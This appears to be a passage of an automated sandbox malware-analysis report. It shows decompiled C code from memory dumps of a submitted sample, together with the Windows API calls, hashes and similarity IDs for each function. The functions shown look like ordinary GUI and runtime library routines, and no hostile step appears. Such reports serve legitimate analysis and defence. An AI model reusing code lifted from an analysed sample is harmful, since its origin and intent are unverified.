									_push( *(_t67 - 0x20));
									E00414A07();
									_t68 = _t68 + 0x14;
								}
							}
							goto L21;
							L27:
							_t31 = E004154B7(_t61);
							__eflags = _t31;
						} while (_t31 != 0);
						goto L36;
					} else {
						_push(_t59);
						E00412A4D();
						L36:
						_t28 = 0;
						__eflags = 0;
						goto L37;
					}
				} else {
					_t28 = E00412247( *(_t67 + 0xc));
					L37:
					return E00412BDF(_t28);
				}
			}
















                                                                              0x00413347
                                                                              0x00413349
                                                                              0x0041334e
                                                                              0x00413353
                                                                              0x0041335a
                                                                              0x0041336a
                                                                              0x0041336d
                                                                              0x0041336f
                                                                              0x0041337d
                                                                              0x00413384
                                                                              0x004134b8
                                                                              0x004134b8
                                                                              0x004134ba
                                                                              0x004134bd
                                                                              0x004134bf
                                                                              0x004134c1
                                                                              0x004134c5
                                                                              0x004134c5
                                                                              0x004134c5
                                                                              0x004134cf
                                                                              0x004134cf
                                                                              0x004134d5
                                                                              0x004134d7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004134d9
                                                                              0x004134df
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004134e2
                                                                              0x004134e8
                                                                              0x004134ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004134ea
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041338a
                                                                              0x0041338a
                                                                              0x0041338a
                                                                              0x0041338d
                                                                              0x00413390
                                                                              0x00413487
                                                                              0x00413487
                                                                              0x0041348a
                                                                              0x0041348c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0041348e
                                                                              0x00413494
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00413494
                                                                              0x00413398
                                                                              0x0041339e
                                                                              0x004133a2
                                                                              0x004133a8
                                                                              0x004133ab
                                                                              0x004133ad
                                                                              0x00413457
                                                                              0x00413457
                                                                              0x0041345b
                                                                              0x00413460
                                                                              0x00413463
                                                                              0x00413465
                                                                              0x00413467
                                                                              0x0041346b
                                                                              0x0041346b
                                                                              0x0041346b
                                                                              0x0041346f
                                                                              0x0041346f
                                                                              0x00413472
                                                                              0x00413484
                                                                              0x00413484
                                                                              0x00000000
                                                                              0x00413463
                                                                              0x004133b3
                                                                              0x004133b9
                                                                              0x004133bb
                                                                              0x004133bc
                                                                              0x004133bd
                                                                              0x004133be
                                                                              0x004133c3
                                                                              0x004133c6
                                                                              0x004133c8
                                                                              0x004133cf
                                                                              0x004133d0
                                                                              0x004133d6
                                                                              0x004133d9
                                                                              0x004133db
                                                                              0x004133e0
                                                                              0x004133e1
                                                                              0x004133e4
                                                                              0x004133e6
                                                                              0x004133e8
                                                                              0x004133e8
                                                                              0x004133ef
                                                                              0x004133f5
                                                                              0x004133fa
                                                                              0x004133fd
                                                                              0x004133fe
                                                                              0x004133ff
                                                                              0x00413404
                                                                              0x00413404
                                                                              0x004133ca
                                                                              0x004133ca
                                                                              0x004133ca
                                                                              0x004133c8
                                                                              0x00413407
                                                                              0x0041340a
                                                                              0x0041340c
                                                                              0x0041340e
                                                                              0x00413412
                                                                              0x00413412
                                                                              0x00413413
                                                                              0x00413413
                                                                              0x00413419
                                                                              0x0041341c
                                                                              0x00413427
                                                                              0x0041342d
                                                                              0x00413430
                                                                              0x00413432
                                                                              0x00413437
                                                                              0x00413438
                                                                              0x0041343b
                                                                              0x0041343d
                                                                              0x0041343f
                                                                              0x0041343f
                                                                              0x00413446
                                                                              0x0041344b
                                                                              0x0041344c
                                                                              0x0041344f
                                                                              0x00413454
                                                                              0x00413454
                                                                              0x00413432
                                                                              0x00000000
                                                                              0x00413496
                                                                              0x00413497
                                                                              0x0041349d
                                                                              0x0041349d
                                                                              0x00000000
                                                                              0x00413371
                                                                              0x00413371
                                                                              0x00413372
                                                                              0x004134ec
                                                                              0x004134ec
                                                                              0x004134ec
                                                                              0x00000000
                                                                              0x004134ec
                                                                              0x0041335c
                                                                              0x0041335f
                                                                              0x004134ee
                                                                              0x004134f3
                                                                              0x004134f3

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d0e75feacb3952567d4b929dbadc0c47e54cdab04a0d338bdacd5cb5536ce837
                                                                              • Instruction ID: 460f3097ad44880e582e2490eeb19ed50333ea5f5c037b58f2b4340b407dfc65
                                                                              • Opcode Fuzzy Hash: d0e75feacb3952567d4b929dbadc0c47e54cdab04a0d338bdacd5cb5536ce837
                                                                              • Instruction Fuzzy Hash: EF41C771D00265AE8F32AF668D448EF7E64EB41766710413FF814A6251DB3C8ED1CB9D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004087EA, Relevance: 7.6, APIs: 5, Instructions: 133COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 82%
                                                                              			E004087EA(intOrPtr* __ecx, void* _a4, signed int _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t59;
				signed int _t61;
				signed int _t62;
				void* _t64;
				int* _t72;
				struct HWND__* _t73;
				intOrPtr _t78;
				struct HRSRC__* _t81;
				void* _t82;
				void* _t86;
				void* _t88;
				void* _t89;
				intOrPtr _t90;
				void* _t93;
				intOrPtr _t95;
				intOrPtr _t101;
				intOrPtr _t103;
				struct HINSTANCE__* _t105;
				intOrPtr* _t106;
				void* _t107;

				_t106 = __ecx;
				_v8 = 0;
				_v12 = 0;
				if(_a8 != 0) {
					_t105 =  *(E0042D179() + 0xc);
					_t81 = FindResourceA(_t105, _a8, 0xf0);
					if(_t81 != 0) {
						_t82 = LoadResource(_t105, _t81);
						_v12 = _t82;
						if(_t82 == 0) {
							return 0;
						}
						_v8 = LockResource(_t82);
					}
				}
				__eflags = _v8;
				_t86 = _a4;
				_t103 = _a12;
				_v16 = 1;
				if(_v8 != 0) {
					_t78 =  *((intOrPtr*)( *_t106 + 0x1c))(_t86, _v8, _t103);
					__eflags = _v12;
					_v16 = _t78;
					if(_v12 != 0) {
						FreeResource(_v12);
					}
				}
				_t59 =  *(_t86 + 0x48);
				__eflags = _t59;
				if(_t59 == 0) {
					L25:
					return _v16;
				} else {
					_t88 =  *(_t59 + 0x40);
					_a8 = _a8 & 0x00000000;
					__eflags = _t88;
					_a4 = _t88;
					_v12 = _t88;
					if(_t88 != 0) {
						_a8 =  *(E00409D70( &_a4));
					}
					_t61 = 0;
					__eflags =  *(_t103 + 8);
					_v8 = 0;
					if( *(_t103 + 8) > 0) {
						do {
							_t89 = _a8;
							__eflags = _t89;
							if(_t89 == 0) {
								L17:
								_t90 =  *((intOrPtr*)(_t103 + 0xc));
								_t62 = _t61 << 3;
								__eflags =  *(_t62 + _t90);
								_v20 = _t62;
								if( *(_t62 + _t90) != 0) {
									_t107 = E00424440(0xc);
									__eflags = _t107;
									if(_t107 == 0) {
										_t107 = 0;
										__eflags = 0;
									} else {
										_t72 =  *((intOrPtr*)(_t103 + 0xc)) + _v20;
										_t73 = GetDlgItem( *(_t86 + 0x1c),  *_t72);
										 *(_t107 + 4) =  *(_t107 + 4) & 0x00000000;
										 *(_t107 + 8) = _t72[1];
										_t103 = _a12;
										 *_t107 = _t73;
									}
									_t93 =  *(_t86 + 0x48) + 0x3c;
									__eflags = _v12;
									_push(_t107);
									if(__eflags == 0) {
										E0042324A(_t93, __eflags);
									} else {
										_push(_v12);
										E00423273(_t93);
									}
								}
								goto L24;
							}
							_t95 =  *((intOrPtr*)(_t89 + 4));
							_t101 =  *((intOrPtr*)(_t103 + 0xc));
							__eflags =  *((intOrPtr*)(_t95 + 0x28)) -  *((intOrPtr*)(_t101 + _t61 * 8));
							if( *((intOrPtr*)(_t95 + 0x28)) !=  *((intOrPtr*)(_t101 + _t61 * 8))) {
								goto L17;
							} else {
								_t64 = _a4;
								__eflags = _t64;
								_v12 = _t64;
								if(_t64 == 0) {
									_a8 = _a8 & 0x00000000;
								} else {
									_a8 =  *(E00409D70( &_a4));
								}
							}
							L24:
							_t61 = _v8 + 1;
							__eflags = _t61 -  *(_t103 + 8);
							_v8 = _t61;
						} while (_t61 <  *(_t103 + 8));
					}
					goto L25;
				}
			}



























                                                                              0x004087f8
                                                                              0x004087fa
                                                                              0x004087fd
                                                                              0x00408800
                                                                              0x00408807
                                                                              0x00408813
                                                                              0x0040881b
                                                                              0x0040881f
                                                                              0x00408827
                                                                              0x0040882a
                                                                              0x00000000
                                                                              0x0040882c
                                                                              0x0040883a
                                                                              0x0040883a
                                                                              0x0040881b
                                                                              0x0040883d
                                                                              0x00408840
                                                                              0x00408843
                                                                              0x00408846
                                                                              0x0040884d
                                                                              0x00408858
                                                                              0x0040885b
                                                                              0x0040885f
                                                                              0x00408862
                                                                              0x00408867
                                                                              0x00408867
                                                                              0x00408862
                                                                              0x0040886d
                                                                              0x00408870
                                                                              0x00408872
                                                                              0x00408953
                                                                              0x00000000
                                                                              0x00408878
                                                                              0x00408878
                                                                              0x0040887b
                                                                              0x0040887f
                                                                              0x00408881
                                                                              0x00408884
                                                                              0x00408887
                                                                              0x00408897
                                                                              0x00408897
                                                                              0x0040889a
                                                                              0x0040889c
                                                                              0x0040889f
                                                                              0x004088a2
                                                                              0x004088a8
                                                                              0x004088a8
                                                                              0x004088ab
                                                                              0x004088ad
                                                                              0x004088e3
                                                                              0x004088e3
                                                                              0x004088e6
                                                                              0x004088e9
                                                                              0x004088ed
                                                                              0x004088f0
                                                                              0x004088f9
                                                                              0x004088fb
                                                                              0x004088fe
                                                                              0x00408925
                                                                              0x00408925
                                                                              0x00408900
                                                                              0x00408909
                                                                              0x00408911
                                                                              0x00408917
                                                                              0x0040891b
                                                                              0x0040891e
                                                                              0x00408921
                                                                              0x00408921
                                                                              0x0040892a
                                                                              0x0040892d
                                                                              0x00408931
                                                                              0x00408932
                                                                              0x0040893e
                                                                              0x00408934
                                                                              0x00408934
                                                                              0x00408937
                                                                              0x00408937
                                                                              0x00408932
                                                                              0x00000000
                                                                              0x004088f0
                                                                              0x004088af
                                                                              0x004088b2
                                                                              0x004088b8
                                                                              0x004088bb
                                                                              0x00000000
                                                                              0x004088bd
                                                                              0x004088bd
                                                                              0x004088c0
                                                                              0x004088c2
                                                                              0x004088c5
                                                                              0x004088dd
                                                                              0x004088c7
                                                                              0x004088d8
                                                                              0x004088d8
                                                                              0x004088c5
                                                                              0x00408943
                                                                              0x00408946
                                                                              0x00408947
                                                                              0x0040894a
                                                                              0x0040894a
                                                                              0x004088a8
                                                                              0x00000000
                                                                              0x004088a2

                                                                              APIs
                                                                              • FindResourceA.KERNEL32(?,?,000000F0), ref: 00408813
                                                                              • LoadResource.KERNEL32(?,00000000), ref: 0040881F
                                                                              • LockResource.KERNEL32(00000000), ref: 00408834
                                                                              • FreeResource.KERNEL32(00000000), ref: 00408867
                                                                              • GetDlgItem.USER32 ref: 00408911
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindFreeItemLoadLock
                                                                              • String ID:
                                                                              • API String ID: 996205394-0
                                                                              • Opcode ID: b151616d18eed73c92286105b6934e45a53b4e3f52cee11c1b33bcc8ae767154
                                                                              • Instruction ID: 5b731adef1ac3c1e154523c16717b7f00c832ecd9bc0f2e4d9b3e5289d424512
                                                                              • Opcode Fuzzy Hash: b151616d18eed73c92286105b6934e45a53b4e3f52cee11c1b33bcc8ae767154
                                                                              • Instruction Fuzzy Hash: 55514971A00205EFCB14EF65C984A6EBBB5FF04350F10C46EE945AB391DB38DA41DB54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0040AEF8, Relevance: 7.6, APIs: 5, Instructions: 126windowthreadCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 87%
                                                                              			E0040AEF8(void* __ebx, void* __ecx) {
				void* _t62;
				void* _t63;
				void* _t76;

				E004128A0(E004310B7, _t76);
				_t62 =  *((intOrPtr*)(_t76 + 0xc)) + 0x2cc;
				if(_t62 > 0xf) {
					L20:
					_t63 = 0;
				} else {
					switch( *((intOrPtr*)(( *(_t62 + 0x40b0e4) & 0x000000ff) * 4 +  &M0040B0BC))) {
						case 0:
							__eax =  *(__ebp + 0x10);
							 *__eax = 2;
							 *(__eax + 8) = 1;
							goto L19;
						case 1:
							_t65 =  *((intOrPtr*)(_t76 + 0x10));
							 *(_t65 + 8) =  *(_t65 + 8) | 0x0000ffff;
							 *_t65 = 0xb;
							goto L19;
						case 2:
							__esi =  *(__ebp + 0x10);
							__ecx =  *(__ebp + 8);
							 *__esi = 0xb;
							E0040B70E( *(__ebp + 8)) =  ~__eax;
							asm("sbb eax, eax");
							 *(__esi + 8) = __ax;
							goto L19;
						case 3:
							__eax =  *(__ebp + 0x10);
							 *(__eax + 8) =  *(__eax + 8) & 0x00000000;
							 *__eax = 0xb;
							goto L19;
						case 4:
							__eax = E00428A50();
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)( *__eax + 0xc))();
							 *(__ebp + 0xc) = __eax;
							__ecx = __ebp + 0xc;
							 *(__ebp - 4) = 1;
							__eax = E0040824D(__ebp + 0xc, 0xf1c0);
							__esi =  *(__ebp + 0x10);
							__ecx = __ebp + 0xc;
							 *__esi = 8;
							__eax = E0042D2A8(__ebx, __ebp + 0xc, __edi, __esi);
							__ecx =  *(__ebp + 0xc);
							 *(__esi + 8) = __eax;
							__ecx =  *(__ebp + 0xc) + 0xfffffff0;
							goto L18;
						case 5:
							__esi =  *(__ebp + 0x10);
							 *__esi = 3;
							 *(__esi + 8) = GetThreadLocale();
							goto L19;
						case 6:
							if( *(__esi + 0x58) == 0xffffffff) {
								_push( *(__esi + 0x1c));
								__ecx = __ebp - 0x20;
								E0042A852(__ebp - 0x20) =  *(__esi + 0x1c);
								 *( *(__esi + 0x1c) + 0x1c) = SendMessageA( *( *(__esi + 0x1c) + 0x1c), 0x138,  *(__ebp - 0x1c),  *( *(__esi + 0x1c) + 0x1c));
								 *(__esi + 0x58) = GetBkColor( *(__ebp - 0x18));
								__eax = GetTextColor( *(__ebp - 0x18));
								__ecx = __ebp - 0x20;
								 *(__esi + 0x5c) = __eax;
								__eax = E0042A8AD(__ebp - 0x20);
							}
							__eax =  *(__ebp + 0x10);
							 *__eax = 3;
							if(__edi != 0xfffffd43) {
								__esi =  *(__esi + 0x5c);
							} else {
								__esi =  *(__esi + 0x58);
							}
							 *(__eax + 8) = __esi;
							goto L19;
						case 7:
							if( *(__esi + 0x60) != 0) {
								L13:
								__edi =  *(__ebp + 0x10);
								 *__edi = 9;
								__eax =  *(__esi + 0x60);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *(__esi + 0x60);
								 *(__edi + 8) =  *(__esi + 0x60);
								goto L19;
							} else {
								__ecx =  *(__esi + 0x1c);
								__eax = E0040A460( *(__esi + 0x1c));
								__ecx = __esi;
								__eax = E0040A7D8(__esi, __eax);
								if( *(__esi + 0x60) == 0) {
									goto L20;
								} else {
									goto L13;
								}
							}
							goto L21;
						case 8:
							__eax = E00428A50();
							__edx =  *__eax;
							__ecx = __eax;
							_t43 = __eax + 0x10; // 0x10
							__esi = _t43;
							 *(__ebp + 0xc) = __esi;
							__edi =  *(__ebp + 0x10);
							 *(__ebp - 4) =  *(__ebp - 4) & 0x00000000;
							__ecx = __ebp + 0xc;
							 *__edi = 8;
							 *(__edi + 8) = E0042D2A8(__ebx, __ebp + 0xc, __edi, __esi);
							_t50 = __esi - 0x10; // 0x0
							__ecx = _t50;
							L18:
							__eax = E00401000(__ecx, __edx);
							L19:
							_t63 = 1;
							goto L21;
						case 9:
							goto L20;
					}
				}
				L21:
				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
				return _t63;
			}






                                                                              0x0040aefd
                                                                              0x0040af0a
                                                                              0x0040af15
                                                                              0x0040b0aa
                                                                              0x0040b0aa
                                                                              0x0040af1b
                                                                              0x0040af22
                                                                              0x00000000
                                                                              0x0040af4d
                                                                              0x0040af50
                                                                              0x0040af55
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040af29
                                                                              0x0040af2c
                                                                              0x0040af31
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040b003
                                                                              0x0040b006
                                                                              0x0040b009
                                                                              0x0040b013
                                                                              0x0040b015
                                                                              0x0040b017
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040af3b
                                                                              0x0040af3e
                                                                              0x0040af43
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040b061
                                                                              0x0040b066
                                                                              0x0040b068
                                                                              0x0040b06a
                                                                              0x0040b070
                                                                              0x0040b078
                                                                              0x0040b07b
                                                                              0x0040b082
                                                                              0x0040b087
                                                                              0x0040b08a
                                                                              0x0040b08d
                                                                              0x0040b092
                                                                              0x0040b097
                                                                              0x0040b09a
                                                                              0x0040b09d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040b020
                                                                              0x0040b023
                                                                              0x0040b02e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040af64
                                                                              0x0040af66
                                                                              0x0040af69
                                                                              0x0040af71
                                                                              0x0040af81
                                                                              0x0040af93
                                                                              0x0040af96
                                                                              0x0040af9c
                                                                              0x0040af9f
                                                                              0x0040afa2
                                                                              0x0040afa2
                                                                              0x0040afad
                                                                              0x0040afb0
                                                                              0x0040afb5
                                                                              0x0040afbc
                                                                              0x0040afb7
                                                                              0x0040afb7
                                                                              0x0040afb7
                                                                              0x0040afbf
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040afcb
                                                                              0x0040afe7
                                                                              0x0040afe7
                                                                              0x0040afea
                                                                              0x0040afef
                                                                              0x0040aff2
                                                                              0x0040aff4
                                                                              0x0040aff8
                                                                              0x0040affb
                                                                              0x00000000
                                                                              0x0040afcd
                                                                              0x0040afcd
                                                                              0x0040afd0
                                                                              0x0040afd6
                                                                              0x0040afd8
                                                                              0x0040afe1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040afe1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040b033
                                                                              0x0040b038
                                                                              0x0040b03a
                                                                              0x0040b03f
                                                                              0x0040b03f
                                                                              0x0040b042
                                                                              0x0040b045
                                                                              0x0040b048
                                                                              0x0040b04c
                                                                              0x0040b04f
                                                                              0x0040b059
                                                                              0x0040b05c
                                                                              0x0040b05c
                                                                              0x0040b0a0
                                                                              0x0040b0a0
                                                                              0x0040b0a5
                                                                              0x0040b0a7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0040af22
                                                                              0x0040b0ac
                                                                              0x0040b0b1
                                                                              0x0040b0b9

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0040AEFD
                                                                              • SendMessageA.USER32(?,00000138,?,?), ref: 0040AF81
                                                                              • GetBkColor.GDI32(?), ref: 0040AF8A
                                                                              • GetTextColor.GDI32(?), ref: 0040AF96
                                                                              • GetThreadLocale.KERNEL32(0000F1C0), ref: 0040B028
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Color$H_prologLocaleMessageSendTextThread
                                                                              • String ID:
                                                                              • API String ID: 741590120-0
                                                                              • Opcode ID: 3bb665a37c1686b71016452803ed37d7d5314458bb89c55caca00ed5bd3541b7
                                                                              • Instruction ID: 9f0f56072def3a876d9543b4c3998127b487ce58a16ed2d3b5e28eadbc79abe1
                                                                              • Opcode Fuzzy Hash: 3bb665a37c1686b71016452803ed37d7d5314458bb89c55caca00ed5bd3541b7
                                                                              • Instruction Fuzzy Hash: B9516D70910306DFCB10EF65C84499EB3F0FF44314B10896EE866AB3A1DB78E855CB9A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042B56F, Relevance: 7.6, APIs: 5, Instructions: 102windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E0042B56F(intOrPtr __ecx) {
				intOrPtr _t30;
				long _t35;
				signed int _t43;
				intOrPtr _t45;
				long _t47;
				struct HWND__* _t50;
				CHAR* _t51;
				int _t52;
				long _t58;
				intOrPtr _t61;
				void* _t64;
				void* _t66;

				_t64 = _t66 - 0x98;
				_t30 =  *0x457184; // 0xc72e1596
				_t61 = __ecx;
				_t58 = 0;
				_push(0);
				 *((intOrPtr*)(_t64 + 0x94)) = _t30;
				 *((intOrPtr*)(_t64 - 0x7c)) = __ecx;
				E0042B4A4();
				_t50 = E0042B4D1(0, _t64 - 0x74);
				 *(_t64 - 0x80) = _t50;
				if(_t50 !=  *(_t64 - 0x74)) {
					EnableWindow(_t50, 1);
				}
				if(_t50 == 0) {
					L5:
					if(_t61 != 0) {
						_t58 = _t61 + 0x74;
					}
					L7:
					 *(_t64 - 0x78) =  *(_t64 - 0x78) & 0x00000000;
					if(_t58 != 0) {
						 *(_t64 - 0x78) =  *_t58;
						_t45 =  *((intOrPtr*)(_t64 + 0xa8));
						if(_t45 != 0) {
							 *_t58 = _t45 + 0x30000;
						}
					}
					if(( *(_t64 + 0xa4) & 0x000000f0) == 0) {
						_t43 =  *(_t64 + 0xa4) & 0x0000000f;
						if(_t43 <= 1 || _t43 > 2 && _t43 <= 4) {
							 *(_t64 + 0xa4) =  *(_t64 + 0xa4) | 0x00000030;
						}
					}
					 *(_t64 - 0x70) = 0;
					if(_t61 == 0) {
						_t51 = _t64 - 0x70;
						_t35 = GetModuleFileNameA(0, _t51, 0x104);
						_t61 =  *((intOrPtr*)(_t64 - 0x7c));
						if(_t35 == 0x104) {
							 *((char*)(_t64 + 0x93)) = 0;
						}
					} else {
						_t51 =  *(_t61 + 0x4c);
					}
					_t52 = MessageBoxA( *(_t64 - 0x80),  *(_t64 + 0xa0), _t51,  *(_t64 + 0xa4));
					if(_t58 != 0) {
						 *_t58 =  *(_t64 - 0x78);
					}
					if( *(_t64 - 0x74) != 0) {
						EnableWindow( *(_t64 - 0x74), 1);
					}
					_push(1);
					E0042B4A4();
					return E00412FBB(_t52,  *((intOrPtr*)(_t64 + 0x94)));
				}
				_t47 = SendMessageA(_t50, 0x376, 0, 0);
				if(_t47 == 0) {
					goto L5;
				} else {
					_t58 = _t47;
					goto L7;
				}
			}















                                                                              0x0042b570
                                                                              0x0042b57d
                                                                              0x0042b585
                                                                              0x0042b587
                                                                              0x0042b589
                                                                              0x0042b58a
                                                                              0x0042b590
                                                                              0x0042b593
                                                                              0x0042b5a2
                                                                              0x0042b5a7
                                                                              0x0042b5aa
                                                                              0x0042b5af
                                                                              0x0042b5af
                                                                              0x0042b5b7
                                                                              0x0042b5d1
                                                                              0x0042b5d3
                                                                              0x0042b5d5
                                                                              0x0042b5d5
                                                                              0x0042b5d8
                                                                              0x0042b5d8
                                                                              0x0042b5de
                                                                              0x0042b5e2
                                                                              0x0042b5e5
                                                                              0x0042b5ed
                                                                              0x0042b5f4
                                                                              0x0042b5f4
                                                                              0x0042b5ed
                                                                              0x0042b5fd
                                                                              0x0042b605
                                                                              0x0042b60b
                                                                              0x0042b617
                                                                              0x0042b617
                                                                              0x0042b60b
                                                                              0x0042b620
                                                                              0x0042b624
                                                                              0x0042b62b
                                                                              0x0042b639
                                                                              0x0042b641
                                                                              0x0042b644
                                                                              0x0042b646
                                                                              0x0042b646
                                                                              0x0042b626
                                                                              0x0042b626
                                                                              0x0042b626
                                                                              0x0042b665
                                                                              0x0042b667
                                                                              0x0042b66c
                                                                              0x0042b66c
                                                                              0x0042b672
                                                                              0x0042b679
                                                                              0x0042b679
                                                                              0x0042b67f
                                                                              0x0042b683
                                                                              0x0042b69f
                                                                              0x0042b69f
                                                                              0x0042b5c3
                                                                              0x0042b5cb
                                                                              0x00000000
                                                                              0x0042b5cd
                                                                              0x0042b5cd
                                                                              0x00000000
                                                                              0x0042b5cd

                                                                              APIs
                                                                                • Part of subcall function 0042B4D1: GetParent.USER32(?), ref: 0042B524
                                                                                • Part of subcall function 0042B4D1: GetLastActivePopup.USER32(?), ref: 0042B533
                                                                                • Part of subcall function 0042B4D1: IsWindowEnabled.USER32(?), ref: 0042B548
                                                                                • Part of subcall function 0042B4D1: EnableWindow.USER32(?,00000000), ref: 0042B55B
                                                                              • EnableWindow.USER32(?,00000001), ref: 0042B5AF
                                                                              • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0042B5C3
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0042B639
                                                                              • MessageBoxA.USER32 ref: 0042B65D
                                                                              • EnableWindow.USER32(?,00000001), ref: 0042B679
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Enable$Message$ActiveEnabledFileLastModuleNameParentPopupSend
                                                                              • String ID:
                                                                              • API String ID: 489645344-0
                                                                              • Opcode ID: cc17ad13df1a3ee67ff1c5259f56978a0c41e258bce0c1314db15f8813c101c3
                                                                              • Instruction ID: 5df43b0a18a6f2eac38b2402b0aec1664a59c8d917e7cf72d3b6daf76ea09937
                                                                              • Opcode Fuzzy Hash: cc17ad13df1a3ee67ff1c5259f56978a0c41e258bce0c1314db15f8813c101c3
                                                                              • Instruction Fuzzy Hash: 8A318131B002699FEB309F65ED85B9EB7B4EF05704F54012AEA059B342DBB89940CB99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00412ABE, Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 86%
                                                                              			E00412ABE(void* __ecx, void* __eflags) {
				void* _v8;
				long _v12;
				long _v16;
				signed char _v23;
				struct _MEMORY_BASIC_INFORMATION _v44;
				struct _SYSTEM_INFO _v80;
				void* _v92;
				void* _t29;
				int _t33;
				intOrPtr _t35;
				void* _t43;
				void* _t46;
				signed int _t49;
				void* _t54;
				void* _t55;
				void* _t62;
				void* _t63;

				_t29 = 4;
				E00412260(_t29, __ecx);
				_t55 = _t63;
				if(VirtualQuery(_t55,  &_v44, 0x1c) == 0) {
					L9:
					_t33 = 0;
				} else {
					_t46 = _v44.AllocationBase;
					GetSystemInfo( &_v80);
					_t49 = _v80.dwPageSize;
					_t35 =  *0x45a3f0; // 0x2
					_t54 = ( !(_t49 - 1) & _t55) - _t49;
					asm("sbb esi, esi");
					_t62 = (( ~(_t35 - 1) & 0xfffffff1) + 0x11) * _t49 + _t46;
					_v12 = _t49;
					if(_t54 < _t62) {
						goto L9;
					} else {
						if(_t35 == 1) {
							_v8 = _t54;
							goto L14;
						} else {
							_v8 = _t46;
							while(VirtualQuery(_v8,  &_v44, 0x1c) != 0) {
								_v8 = _v8 + _v44.RegionSize;
								if((_v44.State & 0x00001000) == 0) {
									continue;
								} else {
									_t43 = _v44.BaseAddress;
									_v8 = _t43;
									if((_v23 & 0x00000001) == 0) {
										if(_t54 >= _t43) {
											if(_t43 < _t62) {
												_v8 = _t62;
											}
